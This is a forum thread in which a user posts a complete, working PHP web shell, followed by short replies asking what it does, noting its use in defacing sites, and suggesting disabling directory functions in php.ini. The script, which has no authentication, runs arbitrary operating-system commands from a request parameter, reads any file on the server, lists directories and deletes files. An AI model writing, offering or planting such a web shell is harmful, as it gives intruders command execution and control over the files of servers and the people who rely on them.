Simple PHP Shell script

[litewarez]

<STYLE type="text/css">
<!--a{text-decoration:none}-->
</STYLE>
<body bgcolor=black>
    <font color=white face="courier" size=2>
        <div align=right>//by phr0z</div>
        PHP shell in <?php echo $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'] ?> <br>
        Server <?php echo $_SERVER['SERVER_NAME']; ?> <br><hr>
        <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method=GET>
            Navigate to:
            <input type="text" name="dir" value="<?php echo $dir ?>" size=50>
        </form>
        <form action="<?php print $_SERVER['PHP_SELF']; ?>" method=GET>
            Execute command:
            <input type="text" name="shell" size=45>
        </form>
<?php

if($_REQUEST['remove'] != NULL)
    unlink($_REQUEST['remove']);

if($_REQUEST['file'] != NULL) {
    $fp = fopen($_REQUEST['file'], "rb");
    if($fp == NULL) {
        echo 'Can\'t open file '. $_REQUEST['file'];
        die;
    }
    echo '<br><br><pre>';
    fpassthru($fp);
}

if($_REQUEST['dir'] != NULL) {
    $dir = $_REQUEST['dir'];
    if(is_dir($dir)) {
        if($dh = opendir($dir))
        echo '<h3>Files in '. $dir .'</h3><br><br>';
            while(($file = readdir($dh)) !== false)
            if(is_dir($dir.'/'.$file))
                echo '<a href="'. $_SERVER['PHP_SELF'] .'?dir='. $dir .'/'. $file .'">'. $file .'</a><br>';
            else {
                echo '<a href="'. $_SERVER['PHP_SELF'] .'?file='. $dir .'/'. $file .'">'. $file .'</a>';
                echo ' [<a href="'. $_SERVER['PHP_SELF'] .'?dir='. $dir .'&remove=' . $dir .'/'. $file .'">'. 'DEL</a>]<br>';
            }
        closedir($dh);
    } else 
    echo '<br><br>Directory '. $dir .' is invalid.';
}

if($_REQUEST['shell'] != NULL) {
    echo '<br><br><pre>';
    system($_REQUEST['shell']);
}
?>

 

[desiboy]

what it does !

 

[Klinzter]

yes what is the script?

 

[ralfy_tm]

I think you can acces a shell with this script via a webpage, but I am not sure

 

[jubster]

This script lists every file/folder on a webspace, more complicated examples are used to deface websites...

 

[lana2008]

A line from the script

echo ' [<a href="'. $_SERVER['PHP_SELF'] .'?dir='. $dir .'&remove=' . $dir .'/'. $file .'">'. 'DEL</a>]<br>';

Wowwwww this is really nastyyyyy

 

[Viz0n]

Adding opendir, readdir to the disabled_functions in php.ini literally kills PHP Shells, but can cause some problems with certain scripts.

 

[Tigger]

don't use the script if you don't know how it exactly works

 

[Ruler]

i guess most of us dont know wat is doest and lana is just afraid to c '&remove=' tag lolz

A line from the script

echo ' [<a href="'. $_SERVER['PHP_SELF'] .'?dir='. $dir .'&remove=' . $dir .'/'. $file .'">'. 'DEL</a>]<br>';

Wowwwww this is really nastyyyyy